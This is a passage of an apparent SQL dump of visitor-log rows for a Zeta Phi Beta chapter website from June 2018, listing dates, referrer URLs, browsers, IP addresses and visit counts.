29kc1FmMVhEZUFDZ29aZVoybXlPU040bG50bnJsWFR6elF2T05XYTJyUFdTQXg1ekZYOVdZT0treG54NFd4NG5LZyws&sign=c5070f930db3966bd2555cbe671b6cd3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.177.107','000',2,0),(31747,'2018-06-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1818.7Mwds3QeWXZnoR-pob8P2vKO4YQhPN-AWcty_Pb10-c.2a65c2abce488d5a505afe37429e986ad353eec2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WVVfMVRwVDJGM0VQQmhOUkVtQnFkUklWZTY3SmJ2dlZCTVRGb2lGMGQxQSws&sign=adef4b28bcec7a731a044a61cd6c117d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.171.164','000',2,0),(31748,'2018-06-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1818.aCdAlxz4GarrOF8FPXFzieIsYcFNrtickhKVVsm2exk.d1dbc5b0292434f04bc8cfe141a5acc7be3f6483&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RUxiMEJrWlF1WURGdUl0QVFsZFoyQ3U5RFdYbnREVXdzcXYtQVE1MHEzQSws&sign=834aa54475499207584c0c64e8e7c4c9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.175.32','000',2,0),(31749,'2018-06-14','https://www.google.com/','Chrome','Android','67.0.3396.81','','71.246.192.42','000',4,0),(31750,'2018-06-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.106.157.151','000',2,0),(31751,'2018-06-14','https://luckybull.io/','MSIE','Windows','6.0','','134.249.54.27','000',3,0),(31752,'2018-06-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.37.234','000',4,0),(31753,'2018-06-14','https://www.google.com/','Chrome','Windows','66.0.3359.181','','74.92.92.81','000',2,0),(31754,'2018-06-14','https://zphiblgz.org','Chrome','Windows','67.0.3396.87','','73.135.211.92','000',2,0),(31755,'2018-06-14','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','51.15.64.39','000',1,0),(31756,'2018-06-14','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.77','000',10,0),(31757,'2018-06-14','android-app://com.google.android.googlequicksearchbox','Chrome','Android','67.0.3396.87','','172.73.5.195','000',2,0),(31758,'2018-06-14','https://zphiblgz.org','xi','Unknown','Unknown','','185.35.63.213','000',1,0),(31759,'2018-06-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(31760,'2018-06-14','https://zphiblgz.org','AppleWebKit','Linux','534.34','','54.91.239.235','000',3,0),(31761,'2018-06-14','http://cc.bingj.com/cache.aspx?q=zeta+phi+beta+alumnae+probate+blogroll&d=5027011862397060&mkt=en-US&setlang=en-US&w=3aASAeZsjX_uBQPlJaLckl-wVBtrI75q','Chrome','Windows','50.0.2661.102','','173.249.30.27','000',1,0),(31762,'2018-06-14','https://zphiblgz.org','Firefox','Linux','58.0','','5.9.94.207','000',1,0),(31763,'2018-06-14','https://zphiblgz.org','Firefox','Linux','58.0','','148.251.75.46','000',1,0),(31764,'2018-06-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','136.243.17.161','000',1,0),(31765,'2018-06-14','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','73.128.240.76','000',6,0),(31766,'2018-06-14','https://www.google.com/','Safari','iPhone','11.0','','174.205.15.61','000',3,0),(31767,'2018-06-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(31768,'2018-06-14','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.34','000',2,0),(31769,'2018-06-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(31770,'2018-06-14','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(31771,'2018-06-14','http://www.stavimdveri.ru/sitemap.html','MSIE','Windows','6.0','','134.249.52.34','000',2,0),(31772,'2018-06-15','https://zphiblgz.org','curl','Unknown','7.55.1','','182.18.140.161','000',1,0),(31773,'2018-06-15','https://zphiblgz.org','Firefox','Windows','38.0','','77.122.71.62','000',1,0),(31774,'2018-06-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.79.186.194','000',2,0),(31775,'2018-06-15','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(31776,'2018-06-15','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(31777,'2018-06-15','https://slomm.ru/','MSIE','Windows','5.5','','178.137.163.137','000',1,0),(31778,'2018-06-15','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','93.100.233.74','000',2,0),(31779,'2018-06-15','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.35','000',1,0),(31780,'2018-06-15','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(31781,'2018-06-15','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.79.176.125','000',2,0),(31782,'2018-06-15','https://odiabetikah.com/','MSIE','Windows','6.0','','134.249.52.34','000',3,0),(31783,'2018-06-15','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(31784,'2018-06-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(31785,'2018-06-15','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.35','000',1,0),(31786,'2018-06-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1819.tM-owYsuMHD8v169pEyPYl9jGBx92c8Yn6V5Z50Q_WQ.17ab4c1867e3fe2b5378091b575c121a7c10bcec&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042d3hTX2hVQkRzdDV4cmw4RG1oVlNfb0NRdFJuMUh1bkRIUThtb2w5VFBRZyws&sign=dccb52f06290ed87ce936dd4b61c8c3e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.179.158','000',2,0),(31787,'2018-06-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1819.MgKEH7YytPtN_DfjTzxaFmihvs4NtG6JnHuZ_IuF2aY.3aca3b2ca8ae3af9201946786749efeabc167fb3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043T2twc3lpQjFOX0ZaNExZOHluYlI2NzRic05Gd0R1ckEtbE53VHpqRlM3Zyws&sign=c496d087eaee557ad712b8a3c92890fd&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','107.170.249.224','000',2,0),(31788,'2018-06-15','https://zphiblgz.org','Chrome','Windows','67.0.3396.87','','112.198.227.53','000',3,0),(31789,'2018-06-15','https://www.google.com/','Chrome','iPhone','67.0.3396.69','','71.121.167.97','000',6,0),(31790,'2018-06-15','http://zphiblgz.org/','Firefox','Windows','30.0','','176.212.128.78','000',2,0),(31791,'2018-06-15','https://zphiblgz.org/','Firefox','Linux','52.0','','101.81.76.104','000',3,0),(31792,'2018-06-15','https://zphiblgz.org','Firefox','Windows','57.0','','148.251.54.44','000',1,0),(31793,'2018-06-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(31794,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.162','000',1,0),(31795,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.187','000',1,0),(31796,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.86','000',1,0),(31797,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.84','000',2,0),(31798,'2018-06-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(31799,'2018-06-15','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','199.30.24.124','000',1,0),(31800,'2018-06-15','https://modforwot.ru/','Unknown','Unknown','Unknown','','178.137.83.231','000',1,0),(31801,'2018-06-15','http://avtovykup.kz/','Opera','Windows','8.00','','178.137.83.231','000',1,0),(31802,'2018-06-15','https://zphiblgz.org','Firefox','Windows','40.1','','2.82.93.190','000',2,0),(31803,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.190','000',2,0),(31804,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.82','000',1,0),(31805,'2018-06-15','https://www.google.com/','Chrome','Windows','67.0.3396.87','','96.244.96.210','000',4,0),(31806,'2018-06-15','https://zphiblgz.org','Firefox','Windows','40.1','','89.232.61.49','000',2,0),(31807,'2018-06-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(31808,'2018-06-15','https://vzheludke.com/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31809,'2018-06-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',2,0),(31810,'2018-06-15','https://zphiblgz.org/','Chrome','iPhone','67.0.3396.69','','174.205.5.108','000',1,0),(31811,'2018-06-15','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(31812,'2018-06-15','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(31813,'2018-06-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(31814,'2018-06-15','http://viagra-soft.ru/','MSIE','Windows','6.0','','178.137.160.170','000',2,0),(31815,'2018-06-15','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','176.58.100.98','000',1,0),(31816,'2018-06-15','http://t-rec.su/','MSIE','Windows','6.0','','178.137.83.231','000',1,0),(31817,'2018-06-15','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(31818,'2018-06-15','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(31819,'2018-06-15','https://www.google.com/','Chrome','Android','58.0.3029.83','','71.241.243.91','000',4,0),(31820,'2018-06-15','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(31821,'2018-06-15','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(31822,'2018-06-16','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(31823,'2018-06-16','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(31824,'2018-06-16','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(31825,'2018-06-16','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(31826,'2018-06-16','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(31827,'2018-06-16','https://ogorodnic.com/','MSIE','Windows','6.0','','178.137.160.170','000',2,0),(31828,'2018-06-16','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(31829,'2018-06-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(31830,'2018-06-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',2,0),(31831,'2018-06-16','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.222.209.32','000',1,0),(31832,'2018-06-16','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(31833,'2018-06-16','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(31834,'2018-06-16','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.7.186','000',1,0),(31835,'2018-06-16','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.24.169','000',2,0),(31836,'2018-06-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(31837,'2018-06-16','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','207.244.70.35','000',1,0),(31838,'2018-06-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1820.9A96oi-T8zwaNm2dch47uCYpXtx9m7B_bsQ8-lpUlKY.12e09ebffca41c6d2f81283bd2bc046953bf2ab7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RzR0SldnRjZlYl9wZUo0blZpczJMYkwzMERvVDhCakdfcDk3cVZTQ2phQSws&sign=a02c89f4e17f19604c99b9897dfb05be&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.56.188','000',2,0),(31839,'2018-06-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1820.b3aHwlDkTi_d5HgqTRt5yDEo2Ix0f_-C0IMdvbE9b4Q.8c5c0e36c9b32b7418ca1ef46696520bf89f89b4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041OGFSYWlHT2JIR1FsV0cxazUwVEp1MFVQemoyLUxsS29CRFJJYldmX0ZMUSws&sign=6cd2e728287c277dbb018d2058578a86&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.160.107','000',2,0),(31840,'2018-06-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1820.4TcZIJVlKkUQXY_FdOtRnD5L3eX6IEo9EzgACHiDAds.650adfd9a01b5fd8d3e4f383e9751e54037961dd&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NnR0ZGR4QXV6ZTRhQkxPeGFGU0w0VlNhWHVnR2psMTFsVFlpTlRBT3liZyws&sign=f5325ab845736a45c2e3adeb075d3600&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.137.156','000',2,0),(31841,'2018-06-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1820.u1NelS8XuKj2p10WGsL35kAO31SZgehIjRss2YtWS98.5789076ea2c570b2684250497286fd8675b19ac5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041N0cwbGdFWFZBMVBlbzNxME9KaFF3bWdJZVcxdHEwMWw5bmgxRVF6U283QSws&sign=7a60ef22ad19de86132a2262c240ecd8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(31842,'2018-06-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1820.xOEBl2wsGX2_EMPKkknVJRsxnixcX_0JMUgKydHYmUE.3773abebbbe811a2c829960643dc4171d23e9304&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SnFHQ0lWV2V0LWpBVWRFbVVyZ24wa2huQ2hWWFIyNGZ5LUVfWHlVbUk4dyws&sign=d6c503e52d4794582a03ec977928f452&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.186','000',2,0),(31843,'2018-06-16','https://www.google.com/','Safari','iPhone','11.0','','108.28.147.32','000',2,0),(31844,'2018-06-16','https://zphiblgz.org','MSIE','Unknown','5.0','','111.223.108.66','000',1,0),(31845,'2018-06-16','https://zphiblgz.org','Firefox','Windows','40.1','','103.43.150.2','000',2,0),(31846,'2018-06-16','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(31847,'2018-06-16','https://officedocuments.net/','MSIE','Windows','6.0','','134.249.48.174','000',4,0),(31848,'2018-06-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(31849,'2018-06-16','http://zphiblgz.org/','Firefox','Windows','27.0','','193.169.252.17','000',3,0),(31850,'2018-06-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','61.154.29.118','000',2,0),(31851,'2018-06-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.57.83','000',4,0),(31852,'2018-06-16','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(31853,'2018-06-16','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(31854,'2018-06-16','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.27','000',1,0),(31855,'2018-06-16','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.28','000',1,0),(31856,'2018-06-16','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(31857,'2018-06-16','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','73.173.224.4','000',1,0),(31858,'2018-06-16','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(31859,'2018-06-17','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(31860,'2018-06-17','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','40.77.189.46','000',1,0),(31861,'2018-06-17','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.34','000',1,0),(31862,'2018-06-17','http://metallo-konstruktsii.ru/','MSIE','Windows','6.0','','178.137.83.231','000',6,0),(31863,'2018-06-17','https://www.souvenirua.com/uk/','MSIE','Windows','6.0','','178.137.160.170','000',9,0),(31864,'2018-06-17','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.135.18','000',2,0),(31865,'2018-06-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(31866,'2018-06-17','https://zphiblgz.org','Firefox','Linux','5.0','','46.105.98.166','000',2,0),(31867,'2018-06-17','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(31868,'2018-06-17','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(31869,'2018-06-17','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',1,0),(31870,'2018-06-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(31871,'2018-06-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1821.m6QdqrEssmy1bmupqwAxQEh1sHTYxmdHDaSCbJkTlvc.1b9ce0bc637de85e07e9739abbdb020200ba712b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040VXNJY1hMZW5EWEU5X1ZYMVl2ZjlLWVN4bzVQY0M2UWlRa2NBdW81bEFUQSws&sign=c761e96e4503d7761b1c2d3d3091747a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.86.185','000',2,0),(31872,'2018-06-17','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.153','000',1,0),(31873,'2018-06-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1821.VWqjx9z4MvQzU65LGPOiY-dQG0bSepChzKwf6ftndCY.0dc4e045ca48699ad4d8b474a647ebe1b6be93b0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043RGc0OFlDQjl6R3gxM3RQcjZLaklWWUZ6ZEN3TXhtUEVJb19DeUZURnNFdyws&sign=ba720276c14504e506713ecf3837f1d5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.67.120','000',2,0),(31874,'2018-06-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1821.EW9LZQ4FEF0MK_2YQ_6u1oh33Ca2k1Nervngo4dFRBQ.6e3c97a286b75c8c6cca3b2549377796f3b6e718&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NTJQT3hEaXFqTmdocmxXVGlvM3djTzhZSEc2VXgtaXpBdHFOMUk5ZUpMdyws&sign=01ebc9789402e873c1a2fd4a669ade8b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.99.10','000',2,0),(31875,'2018-06-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(31876,'2018-06-17','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(31877,'2018-06-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(31878,'2018-06-17','https://zphiblgz.org','Chrome','Windows','41.0.2227.0','','195.22.127.196','000',2,0),(31879,'2018-06-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.231.74','000',2,0),(31880,'2018-06-17','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','96.255.44.253','000',6,0),(31881,'2018-06-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.91.101','000',4,0),(31882,'2018-06-17','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(31883,'2018-06-17','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(31884,'2018-06-17','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.92.238.239','000',1,0),(31885,'2018-06-17','http://zphiblgz.org','Go--client','Unknown','2.0','','54.92.238.239','000',1,0),(31886,'2018-06-17','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','50.16.18.58','000',1,0),(31887,'2018-06-17','https://zphiblgz.org','Chrome','Windows','32.0.1700.76','','54.92.233.250','000',3,0),(31888,'2018-06-17','https://www.google.com/','Safari','iPhone','11.0','','73.128.51.171','000',4,0),(31889,'2018-06-17','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.87','','71.179.160.108','000',2,0),(31890,'2018-06-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(31891,'2018-06-17','https://zphiblgz.org','Firefox','Windows','40.1','','45.42.124.65','000',2,0),(31892,'2018-06-17','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.144','000',1,0),(31893,'2018-06-17','http://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','163.172.4.153','000',2,0),(31894,'2018-06-17','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','46.118.155.165','000',1,0),(31895,'2018-06-17','http://pk-pomosch.ru/','MSIE','Windows','6.0','','134.249.48.174','000',2,0),(31896,'2018-06-17','https://www.google.com/','SamsungBrowser','Android','7.0','','73.129.23.113','000',4,0),(31897,'2018-06-18','https://www.google.com/','Safari','Macintosh','11.1','','104.136.119.101','000',4,0),(31898,'2018-06-18','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(31899,'2018-06-18','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.30','000',1,0),(31900,'2018-06-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.35.135','000',2,0),(31901,'2018-06-18','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(31902,'2018-06-18','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(31903,'2018-06-18','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(31904,'2018-06-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.106.157.151','000',2,0),(31905,'2018-06-18','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.19','000',1,0),(31906,'2018-06-18','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(31907,'2018-06-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(31908,'2018-06-18','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','5.135.173.237','000',2,0),(31909,'2018-06-18','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(31910,'2018-06-18','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.177','000',1,0),(31911,'2018-06-18','https://zphiblgz.org/scholarship/lgzscholarshipreleaseform/','AppleWebKit','Windows','534','','40.77.188.163','000',1,0),(31912,'2018-06-18','https://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','34.216.80.34','000',2,0),(31913,'2018-06-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1822.qZfaSP1E0aOFIChCZaMfbRfFadpXPBMKTAehCjMg1SY.5d0c53f3fa6030fe1581cd482cddceab7118dd31&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QkVldEExdzc2V1FXckJzY3VQOGdhYUtTdnkweWlreHU1RFAtVWFjaXNvZyws&sign=2d7ed2b7e596c454672c8b5978f54a55&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(31914,'2018-06-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1822.eWLXtSq-qEI1OHLIvKsxjvFpZwN7vlr8zYQ2BwzbLtI.82cc4bb4d25f660eb907688541c6751170c193cc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040b29YOXNUOVBYcnVwUGZzaWZ3RmFKZ082b25IUmpOOHkwMHV4VjBHRFRaZyws&sign=80aeff113b1f5f5d685e1d05ca3258bc&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.192.24','000',2,0),(31915,'2018-06-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1822.VydffYZdIdz3a0okJG6xAR5top9xPqBVLz20a1pbuDs.9c95ffc704618b8924ede96eb29de5611636a1d2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043WFBNRzc5dVVSSjlrWW9MZ1VIQ0pIbHZmXzMzQkZuMVhfNUQ0MmFtcVBtQSws&sign=87f13e47496467b55786aeacb775a8a9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.60.250','000',2,0),(31916,'2018-06-